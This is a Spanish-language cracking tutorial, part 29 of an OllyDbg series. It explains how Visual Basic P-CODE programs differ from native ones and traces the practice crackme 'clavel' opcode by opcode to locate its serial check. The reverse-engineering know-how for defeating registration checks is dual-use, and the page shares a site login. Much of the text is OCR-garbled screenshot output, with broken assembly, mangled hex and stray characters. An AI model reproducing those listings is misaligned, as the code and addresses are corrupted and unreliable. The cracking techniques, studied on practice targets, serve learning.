INTRODUCCION AL CRACKING CON OLLYDBG PARTE 29 


Creo que con lo que hemos visto sobre Visual Basic ya hemos completado lo básico, los que quieren 
profundizar en el tema pueden leer estos tutes de crackslatinos que completaran sus conocimientos y no 
valdría la pena repetirlos aquí pues están muy bien hechos. 


http://www.ricnar456.dyndns.org/CRACKING/NUEVO%20CURSO/TEORIAS/TEORIAS%20POR%20 
TEMA/VISUAL%20BASIC/ 


user y pass: hola 


En el cual encontraran muy buenos tutes de Visual Basic como los de COCO, los míos de los 
INVENCIBLES de La Calavera que son bastante difíciles y es una buena practica, los de ARAPUMK de 
los puntos mágicos de Visual Basic y muchos grandes tutes mas que creo innecesario volver a repetir en 
esta introducción pues ya fueron escritos y no descubriríamos nada nuevo, con esto les dejo el camino 
abierto a la lectura y profundización sobre el tema, y pasaremos al tema siguiente que es el P-CODE. 


Los programas de VISUAL BASIC pueden ser de dos tipos, los NATIVE que son los que vimos hasta 
ahora y los P-CODE (PSEUDO CODIGO) que son los que veremos brevemente para introducirlos en el 
tema. 


La diferencia principal radica en que los programas en NATIVE code, ejecutan líneas de código en la 
sección code del programa, mientras que los que son en P-CODE, si los abrimos con el OLLYDBG 
modificado para OEPs y VB y le ponemos un BPM ON ACCESS en la sección CODE, veremos que 
corren y que nunca para en la sección code en EJECUCION, salvo cuando ingresa a alguna api, y aun así 
es evidente que no tiene código ejecutable en dicha sección. 


El desensamblado de un programa en P-CODE no sirve pues al no poseer código que se ejecute, no 
podemos interpretar nada. 

Como ejemplo sencillo, les digo por ejemplo que siempre se ejecuta la dll de Visual y esta va leyendo 
valores s de la sección code que le dicen lo que debe hacer, por ejemplo si lee un 


le hará un Salto incondicional. 


El 1e significara un salto condicional, y en la misma dll de visual Basic se ejecutara el mismo, o sea que 
los valores que va leyendo de la sección code le van indicando a la dll de Visual que debe hacer, aun sin 
ejecutar código en la sección code, solo leyendo valores de ella. 


Ahora como somos guapos, agarraremos el cuchillo para luchar y acometeremos una tarea titánica que 
nadie ha hecho aun, tracear e interpretar un crackme en PCODE todo en OLLYDBG, opcode por opcode, 
jeje. 


Veremos primero un crackme en el cual debemos hallar el serial, llamado clavel, y que se lo robamos al 
amigo JB DUC que tiene muy buenas teorías sobre el tema. 


Por supuesto la mayoría del cracking en PCODE se realiza usando el excelente programa WKT debugger, 
el que quiere ver teorías con el mismo, puede ver las del mismo JB DUC o en el nuevo curso de 
crackslatinos también hay grandes teorías sobre P-CODE, aquí usaremos OLLYDBG y del EXDEC nos 
ayudaremos para ver los nombres de los OPCODES ya que la lista no es suministrada por nuestro amigo 
BILL GATES je. 


[c] File View Debug Plugins Options Window Help 


DS: [EAX], AL 
DS: [EAXJ, AL 
DS: [EAXJ, AL 
DS: [EAXJ, AL 
DS: [EAX, AL 


DS: [EAXJ, AL 
PTR DS: [EAXJ, AL 


PTR DS: [EAXJ,AL 
NS* FENT=-421 MH 


Allí abrimos el crackme en un OLLYDBG común sin parchear y con los plugins para ocultarlo, como 
vimos en las partes anteriores. 


A simple vista parece igual que un NATIVE inclusive el método del 4c se aplica y nos lleva a donde 
están las forms de la misma forma que en los natives (buena idea para quitar nags en P-CODE también, es 
usar el método del 4c cuando funcione) 


Ahora que podemos ver de diferente: 


Si vamos bajando desde el entry point no vemos líneas de código 


ro UD ro 
64:FF0474 INC DWORD PTR FS: [ESP+ESI*2] 
JMP DWORD PTR DS: [ECXI 


CHAR "x=" 


CHAR *"=” 


DO 


purargardurt 


CHAR 1” 
CHAR "t” 


A 


7CS16D4F] RETURA 
rC92 8 ntdll. 
FEFEFFFF 

FDFC 
54A 


DO 
O 


SOON 
0] 


Jn 
DD A 


DO 
pra 
Y 


Solo basura de ese estilo y que si la forzamos a analizar también da cosas sin sentido, recordemos que en 
un Visual Basic native si bajamos desde el entry point vemos algo así. 


OllyDbg - Flipi1.exe - [CPU - main thread, module Flip 


[c] File View Debug Plugins Options Window Help 
» JA! BA ji o» 


[ls] 

5C1A4000 i1.00401A5C 
EC194000 i1.004019EC 
D4324000 11.004032D4 
5C1A4000 i1.D0401A5C 
3414000 11.00401A84 
Ds324000 ¡1.00403208 
5Cc1A4000 i1.D0401ASC 
9C1A4000 i1.00401A9C 


DC324000 
5Cc1A4000 
B41A4000 
EO324000 
cc 


1 BO04432D0C 
i1.00401A5C 
11.00401AB4 
11.004032E0 


Basura parecida pero si continuamos bajando 


[9 He  Yiew  LeDUug  FIUgIns Upuons  vvIndOw Help 


OT ESTU via ele] + 1/elmitiwu]c]7[x]8/r]- Js] 38] 


MOU EBP,ESP 
83EC ac SUB ESP, 6C 
6s Es6104009 | PUSH <JMP. 2MSUBUMEO.. —vbaExceptHandler>| SE handler installation 
64:A1 B9090090Í MOV EAX, DWORD PTR FS:[0] 


50 PUS 
64:3925 B0601 MOU DWORD _PTR FS:[61,ESP 
E (allala]s115] BAG 


DWORD PTR SS: [EBP-C],ESP 
DWORD PTR SS: [EBP-8],Flipil.0040109: 

ESI,DWORD PTR SS: [EBP+8] 
U EAX,ESI 


DWORD_PTR_SS: LEBP-4],EAX 
ESI,FFFFFFFE 


H_ESI 
MOU DWORD PTR SS: [EBP+8],ESI 
MOU ECX,DWORD_PTR DS: [ESI] 


MOU EDX, DWORD PTR DS: [ESIJ 
R EBX,EBX 


SS: [EBP-1C],EB%x 
EBP-20],EBx 
EBP-3B],EBx 

SS: [EBP-40],EB%x 

SS: [EBP-50],EBX 

SS: [EBP-60],EBXx 

| DWORD PTR SS: [EBP-70],EBx 


Ej] DWORD_PTR_SS: [EBP-80],EBX 
BOB3aDa 


Eb 
20104090 
E4 


USH_EAX 
LEA EAX, DWORD PTR SS: [EBP-207 
PUSH ERX 


MOU EDI,EAX 
LEA EDX, DWORD PTR SS: [EBP-1CJ 
PUSH EDX 


MSUBUMGB. _vbaObjSet 


PUSH_EDI 

MOU ECX,DWORD_PTR DS: [EDI] 
AG0BaBa 

CMP_EAX, EBX 

FCLEX 


AAA 


Encontramos código y es bastante largo continua hasta casi el fin de la sección todo puro código 
ejecutable, en cambio en el P-CODE salvo alguna línea suelta que de casualidad por la cercanía de bytes, 
OLLYDBG interpreta como alguna instrucción, es pura basura. 


Volvamos al crackme de PCODE 


MSUBUMSO. rtoRSUalFromBstr 
Apio rtoMsgBox 


SINK_Query Interface 
. UENTZ —SINK_AddRef 

MSUBUMSO. EVENT_ZSINK_Re lease 

MSUBUMSO. MethCal lEngine 

MSUBUMSO. ThunRTM 


PUSH clavel. 00401258 


ADD BYTE PTR DS: CEAXx], AL 
ADD BYTE PTR DS: [EAxJ,AL 
ADD BYTE PTR DS: [EAXJ, AL 


...+. anar ... +... 


Otra característica es la api esa MethCallEngine la cual encontramos en los crackmes hechos en P-CODE, 
así que el primer paso, identificar si el programa es P-CODE o no, ya sabemos como hacerlo, tanto sea 
mirando si hay código ejecutable en la sección CODE o por la api que acabamos de mencionar. 


Lo primero que se nos ocurre hacer es ver si hallamos STRINGS 


avel. 00491970 | Command 
Pd Backup »| Sequence of commands 
EDS Copy »| Constant 
EDS Binary »| Binary string 
E 5 Assemble Space Next 
Label 4 
Bos, 6 A All intermodular calls 
Lave a P All commands 
AA Breakpoint » 
K BS ] All sequences 
Hit trace » 
All Rntvado Ñ All constants 
ños All switches 
TRO' Goto 


del PRENDE User-defined label 


0223: h for User-defined comment 
10. Findreferences to > 
R DS Ñ 

Wiew » 
ero 


II 


EDO »11] Ed A SE ales! 12] 


clave 
00401110 ASCII "Formi 
BO04011CF|ASCII "MS Sans ceci 
m0 


ez 
SES. DLL”, 0 
BB4B1200| ASCII "clavel”,0 
00401207 | ASCII "clave”, 0 
B04012CE| ASCII "Pri oyectol”, 2 
B04012FC|UNICODE "*AC: Ar” 
B640130C|UNICODE "chivos d'” 
B646131C|UNICODE "e progra” 
B046132C|UNICODE "marDeySt” 
B040133C|UNICODE "udioUBs” 


BB4B1S3A ” 2a”,9 

00481554| DD clavel. 00481594 ASCII "Proyectol” 
B0401530|DD clavel. 0B4B159C ASCII "Formi” 
90491598| DD eee 50 ASCII "Commandi_Click” 
BB4B159C| ASCII "Fort 


B04015A4| ASCII proyecto!” B 


OS de p” 
I gramarDevStudi” 
Ba401633 A NS + OLE”, 0 


B0401648| ASCI 

OB4B165C DD clavel. B0401618 ASCII "C: Archivos de programaDevStudiosUBsUBS. OLB” 
B0401660| DD clavel.00401648 ASCII "UB" 

B6461634| ASCII "Commandi”, a 


1”,0 
Ba4016C3| ASCII ¿Command Click”,8 
Ba401704 ONicooE "mero Inc” 
B0401714| UNICODE "orrecto”, a 
00491728 | UNICODE "P-Code”, ú 
B6401740| UNICODE "mero Cor” 


B6401750| UNICODE "rectott”,a 

B0401760| ASCII "ul ”a 

B04017F0/DD clavel. aB4G1728 UNICODE ”P-Code" 
Ba4013824| ASCII ” 

Ba401323 LE clavel. eb491608 ASCII "Form" 
B040184C| ASCII 

B0401850 So clavel. ¿0401684 ASCII "Commandi” 
B6401875| AS 

Ba401873 pal lee ,SB401enO ASCII "Label1” 
B040189D A 

B04013A0 do. Slayer, ¿bógo16na ASCII "Label2” 


BB4B13C5| ASCII ” 
004818C8| DD clavel. B04816C0 ASCII "Text1” 


No ayuda mucho eso en este caso, aunque en algún otro podría ayudar. 


Bueno pongamos un BP tanto en el JMP de la api MethCallEngine como en la misma api directamente, 
por si es llamada sin usar el JMP en forma directa. 


IA 


MSUBUMSO. EVENT —SINK_Query Interface 
MSUBUMSO. EVENT. ES 
MSUBUMSO. EVENTZSINKCRe lease 
MSUBUMSO. MethCal lEngine 

MSUBUMSO. ThunRTMain 


PUSH clavel.00401258 


ADD BYTE PTR DS: CEAXJ,AL 

ADD BYTE PTR DS: [EAXJ,AL 

ADD BYTE PTR DS: [EAXxJ, AL 
RUTF PTR NMa*TFO%Y1 


. . . . drdira o. 


Buscamos arriba del Entry Point y encontramos rápidamente el JMP a la api MethCallEngine, y 
situándonos encima y haciendo click derecho FOLLOW vamos a la misma, donde también ponemos un 


BP. 
MSUBUMSO. EVENT_SIT? 
MSUBUMSO. EVENTZSI? 
MSUBUMSO. EVENT_SI? 
hCal LE 
Backup » inRTMai 


de] 
la 


ERE 


4 

004 PUSH clavel. 0040125 

1515] 

c6ge ed h 
2 Binary » 
aBn4b 

0040 Assemble Space 
BO401644 

46401545 Label 

aBu4B1B47? 

B64B10 a, 

ia Comment , 

0040 i 

e So Breakpoint » 
0040 ; 

004 Lc Hit trace » 
0048 DWORD _PTR pS: tE 

90040 BYTE PTR DS: Run trace » 
0048 BvyTE PTR DS: CER 

904 BYTE PTR DS: CEA 

0040 BVyTE PTR DS: [EC 

004 BYTE PTR DS: CEA 

0040 BvTE PTR DS: Go to » 
HH 


SUB DWORD PTR SS: [ESP+4],ERXx 
B9 02E31374 |MOU ECX, MSUBUMSO. 7413E302 
sE 39N2FFFF 


PUSH_EBP 
B8BEC MOU EBP,ESP 
FF7424 08 PUSH DWORD PTR SS: [ESP+8] 
FF7S aC PUSH DWORD PTR_SS: [EBP+C] 
ES C4F1FFFF 

PUSH 


B 
once 14 LEMA En Mminon DTD Sc. TODDAiA1 


. o. . . . dire » dr 


Ahora damos RUN. 


= Curso sobre P-Code. Por ... (X] 


Introduce tu clave de registro 


Clave: | 


Registrar 


Vemos que aparece la ventana para ingresar el serial falso antes de parar en la api, lo cual es lógico 
porque la creación de las ventanas y todo esto lo realiza en la misma forma que en VB nativo, la misma 
dll de visual sin ejecutar código del programa, al leer las forms que vemos con el método 4c. 


Ahora ingresamos el serial falso. 


= Curso sobre P-Code. Por ... [X| 
Introduce tu clave de registro 


Clave: — [98ge389g 


Registrar 
Y apretamos REGISTRAR 


CEE >) eje $0) 3 1] ejmjrjwjn]c]Jx]8]rJ-Js] E 


EZ MSUBUMSO. MethCal lEngine 
MSUBUMSO. ThunRTMain 


ADD BYTE PTR DS: [EAxJ,AL 
ADD BYTE PTR DS: [EAXxJ,AL 
ADD EYTE PTR DS: [EAXJ, AL 
XOR BYTE PTR DS: [EAXJ,AL 
( - ann RUTE PTR NS=rFO%1 a 


a 
B 
B 


Para en el JMP que iniciara la parte verdadera de P-CODE. 


. om Y m>ovrr A ds nd Y A Y op 


EX STA min $0 1) + 1]ejmt]w 


E DWORD _PTR SS: [ESP+4],ERXx 


ñ0U ECX, MSUBUMSO. 7413E392 


PUSH_EBP 
MAI FRP ESP 


Allí entra a la api veamos que va haciendo 


1] FI. view  DEDUG  FIUGInIs  UOpuuris — VYINUUwW Mel 


al] +] 1jejmiT]wjH[c] 
PUSH_EBP 


MOU EBP,ESP 
SUB ESP, 73 
PUSH EBX 
PUSH ESI 
PUSH_EDI 
MOU EBX, EDX 
MOU DWORD PTR SS: CEBP-50],EBXx 
MOV DWORD PTR SS: [EBP-6C 7, ECX 
MOU_EDX, DWORD PTR DS: [7414F064] 
OR_EDX, EDX 


MOU EDX, DWORD PTR DS: [7414FB6C] 
MOV EDI,DWORD PTR DS: [EBX] 


GBDZ 

GOFSS 9630001 
38B15 6cFala?. 
3B3B 

Allí comienza 


Ahora si abrimos el mismo crackme con el exdec que es un desensamblador de PCODE para ayudamos, 
vemos que nos muestra esto. 


e a E 


local_008C 


text 
local_0088 
local_0088 ] 
get_ ipropTEXTEDIT 
local_008C 


local_008C 
local_0088 
:1c BranchF: 401BF6 

401BF3: 1e Branch: 401c94 
401BF6: Lead3/c1 LitVarl4: [local_3BE500AC ] 0x3c41a (246810) 
401BFE: Lead1/f6 FStVar local_009C 
401C02: 04 FLdRfYar local_008C 
401C05: 21 FLdPrThis 
401C06: 0f VCallAd text 
401C09: 19 FStádFunc local_0088 


O sea el primer byte que lee es un 04 y esta en la posición 401BDO ese seria el primer byte leído, eso 
debe ocurrir no muy lejos de aquí, así que pongamos un BPM ON ACCESS en dicho byte. 


ssetose| | Beso| Searchfor  » [os:ceag+721,0L 
J40106E : E AA 
340106F MS Goto » xpression It HG 
20108 Expression ¡WrH 
3401075 —POSTTEDST>A 
3401078 ; DS: [EBX], AH 
340107A Y Hex j 
240107E DS: [EAXJ, AL 
2401070 Text > (OS: CEAXI, AL 
340107? . UB 
¿4b1681| . CC Short d 
2401682 | . 3100 R DS: [EAXI, EAX 
2401084 a4 43 Long » 
34010 ED 43 
34010 6 Float » 

Disassemble 

Special » 


401BDO 


40456106 /M4 
AB6401BDS| 78 15] 

BO04B1BE£0/00 BB 74 FF 18 61 B0/.. 
BO4B1BES|FB 30"8F 74/FF 1A 78 FF 
p0401BFB|1C 26 00 1E C4 00 FE Ci 
B6401BF3|54 FF 1A C4 63 60 FC F6 
arRAA1ICanÍl Ad FE Md 74 FF 21 0-04 


Ese serial el primer byte que leería, cuando para, estaríamos en el inicio, de cualquier forma podemos 
llegar a el sin el EXDEC, una vez que para en el BP de la api MethCallEngine, ponemos un BPM ON 
ACCESS en la sección code. 


003E0000/| 0OBBADOO Priv|R E Ru 

003F0000| 00004000 Priv|Ru Ry 

500400000 00001000 | clavel po SSdsn Imag R RWE 
le AE x 


16401000 0001000 clavel «text ll 
00402000 | BO0B1000| clavel «data data Actualiza 


eo eel oo Sa 
clave «ISro resou Á Pp i 
0D405000| O0BB10D0 clavel |.reloc |reloc  YIew in Disassembler Enter 
00419900| 0ABA900a Ñ 
00400090 | BABB2090 Dump in CPU 
004E9900| 09103009 
00SFaGa0|0a112009 Dump 
pi 
E ssp pei eiii 
00E09900| BALA4aBa Search next CtrhL 
10601099| cssoadas| Skh Ahi 
9 «Text code 
10008000| 00083994 akh irdata [impor  Setbreak-on-access F2 
1000€000| 490002090 | akh idata [data 
10910000| 09091998| akh .HOOKDAT 
10011000 009910009) akh «Tsrc resou set memory breakpoint on a 
10012000 | 00001000! akh .reloc reloc 
SR1SARAAR! ARRAA1ARA | ustheme PF he Cot maranre hroaalnnint an writa 


Y damos RUN vemos que para varias veces 


. 8B15 64F9147/M0U_EDX,DWORD PTR DS: [7414F064] 
BBD2 OR _EDX, EDX 
.v BFS5S 6963000 
. 8B15 scEa142 HON EDX, DWORD PTR 0S:[7414F56C] 
. 8B3B MOU EDI,DWORD PTR DS: [EBXJ clavel. 004501760 
. 8B77 34 MOU ESI, DWORD PTR DOS: [EDI+34] 
. 8975 AC MOU DWORD PTR SS: [EBP-54],ESI 
. 8B77 04 MOU ESI, DWORD PTR DS: [EDI+4] 
. 8B76 14 MOU ESI,ODWORD PTR DS: [ESI+14] 
. 8B76 BC MOU ESI, DWORD PTR DS: [ESI+CI 
. 8975 D4 MOU DWORD PTR SS: [EBP-2C],ESI 
> 8955 BC MOU DWORD HE SS: [EBP-447, E 
. 0745 B3 os DWORD PTR SS: [EBP-4871,0 PS 
. B1F9 ECXx ASUBUMBO: 7413E302 
¡30250 | 3 area 94B400dl JE MSUBÚNSA: 7419BSe6-—... .. 


Pero la única que lee del contenido de ESTI que apunta al byte susodicho, la hallaremos enseguida, luego 
de unas cuantas veces que pare.( en mi maquina conté 10 exactas) 


[c] File View Debug Plugins Options Window Help 


PEO EI” EE! ESE al Er L/E/m/T]w/H]c] 


TNC Esto 


66:F743 0C 11 TEST WORD PTR DS: [EBX+C],10 
.v BF85 59620001 JNZ MSUBUMSO. 7414358B 


La primera vez que para y lee un byte de [ESI] y lo mueve a AL es donde comienza a leer el primer 
opcode de P-CODE, de esa forma podemos encontrar el primer byte sin siquiera usar el EXDEC. 


Como vemos los siguientes opcodes que muestra el exdec están a continuación del anterior. 


Proc: 401c98 


04151811): 04 FLdRfYar local_008C 

401BD3: 21 FLdPrThis 

401BD4: Of YCallAd text 

401BD7: 19 FStádFunc local_0088 

401BDA: 08 FLdPr local_0088 

401BDD: 0d YCallHresult get_ ipropTEXTEDIT 
401BE2: 6c ILdRf local_008C 

A401BE5: 1b LitStr: e 


401BE8: Lead0/30 EqStr 


Como ven están en orden, aunque 
ejecutarse. 


st tx.4, 
RH Bx .á. 
..1t +0, 
10/t +u 
A 
T +4. 
d +t te, 
O > 
Ane lt o. 
B.0.*kT 
led * Et 


tengan en medio, los parámetros que necesita cada opcode para 


SA 
Rc E 


DEL 


ADD ESI,EBx 
MOU DWORD PTR SS: [EBP-58],ESI 
mou ER Ad SS: [EBP-14],ESI 


¿BYTE PTR DS: [ESIJ 


TEST WORD PTR_DS: [EBx+CJ,10 
TEST_WORD PTR_DS: [EBX+C],20 
OR ERAX, ERX 


20800000 | MOV EAX, BEGBa 


Como vimos allí lee el primer byte 


isters (FPU) 


— | ERAX 00B0BBBO 
ECX BB12FA1LC 


AN 


EDx 74056900 MSUBUMSO. 740569D0 


—— JEBX B04B1C9S clavel. 104801098 


ESP BB12F3C4 


EDI 061593888 


EIP 74130310 MSUBUMSO. 7413D31C 
C O ES 0923 Sebit OLFFFFEFFR) 


Lo que vemos es que ESI apunta al byte actual que se esta ejecutando, pero ya en la línea siguiente antes 
de hacer ninguna operación lo incrementa en 1, para leer los parámetros del opcode. 


IA EA aaa 1) 1 1 4 4 4 4 Y fl 


INC ESI 


MOU DWORD _PTR SS: [EBP-14],ESI 
20R EAX, 
MOU AL,BYTE PTR DS: [ESI] 


EAX 


5 
5 


cl BFES 5362009 


66:F743 BC 11 TEST WORD PTR_OS: [EBx+CJ,10 


££:F7?7d42 Ar TEST MARN PTR NS: PFRY+PA1 24 h 


Luego llega siempre a un JMP indirecto que nos lleva a las líneas que ejecutaran el OPCODE, en este 


caso 04 como vimos en el EXDEC. 


401BDO0: 04 FLdRfVar local_008C 


Veremos que hace este opcode tan misterioso entramos en el. 


2] > 1]Ejm]T]wH]c] //K/B/R]..]s 


MOUSA EAX, WORD PTR DS: [ESI] 
ADD EAX,EBP 
PUSH_EAX 


MOU AL, 


XOR EAX, ERX 


ADD Els 


BYTE PTR DS: [ESI+2] 


Allí vemos la ejecución del OPCODE 04 FLdRfVar, son unas pocas líneas de código, nada para 
asustarse jeje y siempre vemos que termina con un XOR EAX,EAX y a leer el siguiente opcode. 


Lo primero que hace es cargar los parámetros del OPCODE que son los dos bytes siguientes al mismo. 


S0R EAX, EAX 
MOLL OLE PTE 


Jumps from 7413D31F, 7413D03A9, 741303F6, 74130420, 74130442, 7413D454, 


Bueno los pasa a EAX y como es un MOVSX y el valor FF74 es negativo los completa con FFs como 
vimos en la parte de assembler, sigamos traceando. 


E 

EBx Bb 

ESP ba 

EBP 6 

ESI MBA 

EDI 66 

EIP 74 MSUBUMSO. 7413D9A5 
CO ES bit BLÍFFFFFFFF) 
Pi Cc bit BLFFFFFFFF) 
AA ss 22hit MÍFFFFFFFF1 


Ese valor es EAX es -8c, pues si hacemos doble click en el 


Modify EAX 
Hexadecimal 


Signed | -140 


Unsigned | 4294967156 
Char [FF [FF [FF l 


co 


Nos muestra que vale -140 decimal que es -8c en hexa por lo tanto, como vemos el 8c que nos muestra el 
EXDEC aparece aquí. 


401BDO: 04 FLdRtVar local_008C 


En la siguiente línea suma ese valor que leyo de los parámetros con EBP 


74056900 MSUBUMSO. + 
BoO4B1C938 clavel. 004 
BO12F3C4 
BO12F4E0 
B04618D1 clavel. 004 
601598388 


7413D9A7 MSUBUMSO. + 


C 1 ES 0023 32bit OEF 
PO CS 6618 32bit 6 


Y luego le hace PUSH a ese valor 


O sea que esto es equivalente a un PUSH EBP- 8c esta mandando el stack una variable local, en mi 
maquina EBP es 12f4e0 si a eso le restamos 8c nos da 12f454 que es el valor que quedo en EAX y 
pushea. 


Command ? 12f4e0 - 8c y] HEX-12F454- DEC: 1242196 - ASCII: DÓT 


ERE 


LALALA LALALA LA 


73 00 5C 00 70 00 63 DOl<.x.p.c. 


Er 


—EAX 0012F454 
ECX BB12FAIC 


| 111 


EDI 00159388 
EIP 7413D9A7 
Cc 1 


E 


EDx 740569D0 MSUBUMSO. 74056900 
EBxX B04B1C98 clavel. BB401C93 


lavel.00401BD1 


MSUBUMSO. 7413D9A7 


ES 0023 32bit 
PO CS BB1B 32bit 
Ss BB23 Sebit 


OLFFFFFFFE) 
OCFFFFFFFF) 
O(FFFFFEFE) 


Nada del otro mundo sigamos. 


AMA A 27 $585 9) 2 II O A 


MOUSX EAX, WORD PTR DS: [ESI] 


OFEFOS 


ADD EAX, EBP 
PUSH_EAX 

HOR 
ADD ESI,3 


EAX, EAX 
MOU AL,BYTE PTR DS: [ESI+2] 


MOV EAX, DWORD PTR SS: [EBP+8] 


Vemos que luego pone EAX a cero lo cual significa que la operación con este opcode ya finaliza y esta 
inicializando los registros para leer el siguiente, en la próxima línea ya lee el opcode siguiente. 


Email josephco_(Mhotmail.com with any errors or prob 


Proc: 401c98 
401BD0: 04 FLdRfYar 


local_008C 


E101B6D3: 21 FLdPrThis 


401BDA: 0f VCallAd text 

401BD7: 19 FStádFunc local_0088 
401BDA: 08 FLdPr local_0088 
401BDD: 0d VCallHresult get_ ipropTEXTEDIT 
401BE2: 6c ILdRf local_008C 
4018BE5: 1b LitStr: pS 

401BE8: Lead0/30 EqStr 

401BEA: 2f FFreelStr local_008C 
401BED: la FFreelAd local_0088 
401BF0: 1c BranchF: 4018BF6 
401BF3: 1e Branch: 401c94 


A4018F6: Lead3¿c1 LitVarlA: 


401BFE: Lead1¿f6 FStVar 


[ local_3BE500AC ] 0> 
local_009C 


401C02: 04 FLdRfYar local_008C 
401C05: 21 FLdPrThis 

401C06: 0f VCallAd text 

ANIONA: 19 FOtAdFune laral ANAR 


El segundo opcode es el 21 


Aquí lo lee 


El EAN EAX 
AL BUTE PTR DS: [ESI+2] 
ef] Es 


MOU EAX, DWORD PTR SS: [EBP+8] 
MOU Dl ORD PTR SS: [EBP-4C],EAX 
XOR EAX, EAX 

MOU AL,BYTE PTR DS:[ESI] 


MOUSX_EAX, WORD PTR DS: [ESIJ 


MOU WORD_PTR DS: [EAX+EBPI,BXx 
XOR EAX, EAX 
MOU AL,BYTE PTR DS: [ESI+2] 


MOUSX EAX,WORD_PTR_DS: [ESIJ 
POP DWORD _PTR DS: [EAX+EBP] 


MOUSX _EAX, WORD PTR DS: [ESI] 
De a PTR DS: [EAX+EBP] 


TES Sub [11] 


ZOR EAX, EAX 
moy aL, BYTE PTR DS: [ESI+2] 


mou q DWORD_PTR SS: [ESP] 
MOU AX,WORD PTR DS: [EDI] 
AND 4 BEF 

CMP AX, 9 


RA1C7OBa 


an 
XOR EAX, ERX 


s5P 6n12 
0B12F4E0 
SI 6064618601 clave 


Lo mueve a AL como siempre. 


[c] File View Debug de paitb Window Help 


MSUBUMSO. 7413D9B7 
MOU EAX, DWORD PTR SS: [EBP+8] 


MOV DWORD PTR SS: [EBP-4C7,EAX 


Y ahora le suma a ESI el valor 3 para que quede apuntando a los parámetros de este opcode, luego llega 
al JMP indirecto, que va al código del OPCODE 21. 


Veamos que hace buscando intensamente en google 


'21, FLdPrThis 
"Load reference pointer into item pointer. 


Bueno hay aquí algunos punteros que no sabemos bien para que sirven, ni sirve mucho pero el tema es 
que carga un reference pointer y lo guarda en item pointer, en asm esto nos dice que lee un puntero del 
stack y lo mueve a otro lugar de nuestro stack. 


Si seguimos traceando 


AA AA Ad 
MOU EAX, DWORD PTR SS: [EBP+8] 

MOU DWORD _PTR SS: [EBP-4C],EAX 
S0R EAX, ERX 

MOU AL,BYTE PTR DS: [ESI] 

INC ESI 


Lo que vemos es que lee el contenido de EBP + 8 (reference pointer) y lo guarda en el contenido de 
EBP-4c ( item pointer) 


Bueno el valor que lee en mi maquina es 15b000 si vemos en el DUMP 


> 7413D9BA MSUBU 


bit 
bit 
bit 
bit 


0+B.E+B, 
POPEaRiA 
SNE 
he3.p3. 
PODA 


$...==% 
- ¡araiara m m TA 


Jr Jr Jr JJ fe o fa o fa Jl fa Je Jr fa jo pa pt 
noni on nn nn ón non ón an ón an on an an dl 


[5] 

Bl... 140. 
Dlitaot 
Omtt0 pt 


30 tiM.t 
EG.tG<Tt 
ecTtes Tit 
ge dtás Tit 
¿61 


Etc Tt 
iecMtóc It 
beTt -<Tt 
Set. dt 
Bent oént 
tE! ÉTt 
CENTOEÉNT 
SÉTteETnt 


Command ? 12f4e0 - Bc vw | HEX: * 


Vemos que alli comienza una tabla asi que 15b000, el reference pointer apunta a algo que parece una 
tabla, aunque esto no nos ayuda mucho para el cracking es bueno siempre tratar de ir descifrando un poco 
lo que hace el programa, lo mas profundamente que podamos y de acuerdo a la poca información que 
tenemos. 


Por lo demás este es un comando sin parámetros por lo cual, no hay variación en el mismo, seguramente 
al ejecutarlo lee siempre el reference pointer y lo guarda en el item pointer y chau, jeje. 


Bueno continuemos 


CEEL Sra col + MA 


MOU EAX, DWORD PTR SS: [EBP+8] 
MOU DWORD _PTR SS: [EBP- 401, EAX 
XOR EAX, EAX 


MOU AL,BYTE PTR DS:[ESI] 
INC ESI 


MOUSX EAX, WORD PTR DS: [ESIJ 


DO 
LBRABRADL 
DI DO 
o 


SODO 
OADAC 


y 
y 


DD 
NODO 


pr po 


1 
1 
1 
al 
1 
1 
1 
1 


Command] ? ebp-4c v| HEX 12F4 


Que es OF en el EXDEC vemos que se trata de 


Proc: 401c98 
401BD0: 04 FLd 
401BD3: 2 rThis 


local_008C 


401BD4: 

401BD7: 19 FStádFunc local_0088 

401BDA: 08 FLdPr local_0088 

401BDD: 0d YCallHresult get_ ipropTEXTEDIT 
401BE2: 6c ILdRf local_008C 

4018BE5: 1b LitStr: di 


401BE8: Lead0/30 EaStr 
VCallAd 


'OF, VCallád, FC, 02 

'Access an ¡tem's method. 

'Parameter 1 = 2 bytes. 

'Parameter 1 ¡is offset into item's Descriptor table. 
'Offset = 2h2FC, 

'Method at offset in item's Descriptor table is accessed, 
'Method's return value is pushed onto stack, 

'Stack operations: Method dependent + Push x1. 


Bueno aquí vemos la idea de lo que hace el siguiente OPCODE 0F, vemos que tiene un solo parámetro de 
2 bytes 


El parámetro en mi caso es 0300 y dice que dicho valor es un offset en la item descriptor table, hmm 
veamos, entremos en el JMP indirecto así miramos si coincide con lo que dice. 


MOU EBX, DWORD PTR SS: [EBP-40] 
PUSH EBX 
MOUZX_EAX, WORD _PTR_ DS: [ESI] 


ADD ORO Pn PTR DS: [EBXJ 
PUSH_EAX 

XOR EAX, EAX 

MOU AL,BYTE PTR DS: [ESI+2] 
ADD ESI,S 


Allí esta lee el famoso contenido de EBP-4c y lo pasa a EBX 


A |Registers (FPU) 

——|EAX BOBBABDF 

ECX aAB12FA1C 
MSUBUFr 


ESP BO12F3CO 
EBP B012F4E0 
ESI 600461805 clavel 
EDI 66159888 


EIP 7413ES9E MSUBUN 
Co ES 0023 32bit 
CS 6B1B 32bit 


! 
AG SS 6623 32bit 
Zz 6 DS 6023 32bit 


[Am 


ala eu] vis $03) el + u]ejmjt]wjH] 


) B4 MO EN ¿DWORD PTR SS: [EBP-4C] 


PUSH EBX 
MOUZX EAX, WORD PTR DS: CESIJ 
ADD EAX, DWORD_PTR DS: LEBX] 


PUSH_EAX 

S0R EAX, EAX 

MOU AL,BYTE PTR DS: [ESI+2] 
ADD ESI,3 


Mew ET MUNDA DTD Mc. TESTA q 


Bu12FA1C 
EDx 74056900 MSUB 
EBx BB1SBOGO 
ESP BB12F3BC 
EBP B012F4E0 
ESI 60401ED5 clau 
EDI 60159888 
EIP 7413E8A2 MSUB 


Fa FS a4972 22hi 


EEES 00) Msivil did 0 ol OL O 


MOU EBX, DWORD PTR SS: LEBP-40] 

PUSH EBX 

MOUZX EAX, WORD_PTR_DS:[ESI] 
D DIJORD_PTR DS: LEBX] 


[Em 


PUSH_EAX 
20R EAX, ERX 
AA St ENTE PTR DS: [ESI+2] 


Y aquí el quid de la cuestión como EBX vale 15b000, su contenido es el inicio de la tablita que vimos, 
que según la aclaración es la ITEM DESCRIPTOR TABLE, o sea 4022e8 


a 2 10 » +] $0] 9] + LJEJMT|/WH)|C)/JK]B¡R 


